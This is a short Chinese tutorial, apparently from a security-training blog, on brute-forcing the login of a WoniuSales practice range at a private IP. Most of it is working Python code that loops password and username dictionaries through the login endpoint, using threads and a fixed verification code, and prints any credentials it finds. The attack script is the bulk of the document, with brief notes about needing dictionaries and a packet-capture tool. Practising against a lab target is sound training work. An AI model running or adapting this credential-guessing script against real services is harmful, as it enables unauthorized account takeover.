前言
靶场系统的登录–爆破密码
遍历密码字典–>登录请求–>获取验证通过的数据–>正确的密码
1、单用户
2、多用户-已知用户名
3、多用户-未知用户信息
python密码暴破,引用三个模块time,requests,threading
下面是暴破源代码
import time
import requests,threading
def login():
url='http://192.168.14.148:8080/woniusales/user/login'
with open('password-top500.txt','r') as fp:
datas=fp.readlines()
for dt in datas:
password=(dt.strip())
data={"username":"lency","password":password,"verifycode":"0000"}
res=requests.post(url=url,data=data)
if res.text != 'login-fail':
print(f'爆破成功,密码为:{password}')
break
else:
pass
def login_thread(password):
url = 'http://192.168.14.148:8080/woniusales/user/login'
data = {"username":"lency","password":password,"verifycode":"0000"}
res = requests.post(url=url,data=data)
if res.text != 'login-fail':
print(f'爆破成功,密码为:{password}')
exit('爆破成功')
else:
pass
def do_login(username):
url = 'http://192.168.14.148:8080/woniusales/user/login'
with open('password-top500.txt','r') as fp:
datas = fp.readlines()
time.sleep(0.2)
for dt in datas:
password = (dt.strip())
data = {"username":username,"password":password,"verifycode":"0000"}
res = requests.post(url=url,data=data)
#print(res.text)
if res.text != 'login-fail' and res.text != 'user not exists':
print(f'爆破成功,用户为:{username},密码为:{password}')
exit('爆破成功')
else:
pass
if __name__ == '__main__':
# with open('password-top3000.txt','r') as fp:
with open('username-top500.txt','r') as fp:
datas=fp.readlines()
ths=[]
for dt in datas:
username=dt.strip()
th=threading.Thread(target=do_login,args=(username,))
ths.append(th)
for t in ths:
t.start()
需要一个密码字典和一个用户名字典,抓包工具也得有
至于能否暴破出来,取决于你的电脑配置及字典大小和时间
已知用户名暴破指定用户的密码,相对容易。